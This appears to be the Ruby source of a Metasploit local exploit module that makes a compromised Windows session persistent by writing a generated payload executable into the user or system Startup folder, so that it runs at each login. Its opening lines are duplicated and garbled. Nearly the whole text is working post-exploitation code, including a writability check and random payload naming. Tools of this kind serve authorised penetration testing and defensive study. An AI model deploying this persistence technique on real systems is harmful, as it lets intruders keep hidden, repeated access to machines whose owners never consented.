Windows Persistent Startup Folder

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::Local::Persistence
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Persistent Startup Folder',
'Description' => %q{
This module establishes persistence by creating a payload in the user or system startup folder.
Works on Vista and newer systems.
},
'License' => MSF_LICENSE,
'Author' => [ 'h00die' ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Targets' => [
[ 'Automatic', {} ]
],
'DefaultTarget' => 0,
'References' => [
['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
['URL', 'https://support.microsoft.com/en-us/windows/configure-startup-applications-in-windows-115a420a-0bff-4a6f-90e0-1934c844e473']
],
'DisclosureDate' => '1995-01-01', # windows 95
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
OptEnum.new('CONTEXT', [false, 'Target current User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ])
]
)
end

def folder
if datastore['CONTEXT'] == 'USER'
f = session.sys.config.getenv('%userprofile%')
f = "#{f}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
return f
end
f = session.sys.config.getenv('%ProgramData%')
"#{f}\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
end

def check
f = folder
begin
# windows only ps payloads have writable? so try that first
return CheckCode::Safe("Unable to write to #{f}") unless writable?(f)
rescue RuntimeError
filename = f + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))
write_file(filename, '')
if exists? filename
rm_f(filename)
return CheckCode::Appears("Likely exploitable, able to write test file to #{f}")
else
return CheckCode::Safe("Unable to write to #{f}")
end
end

CheckCode::Appears('Likely exploitable')
end

def install_persistence
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
payload_exe = generate_payload_exe
payload_pathname = folder + '\\' + payload_name + '.exe'
vprint_good("Writing payload to #{payload_pathname}")
fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")
@clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
end
end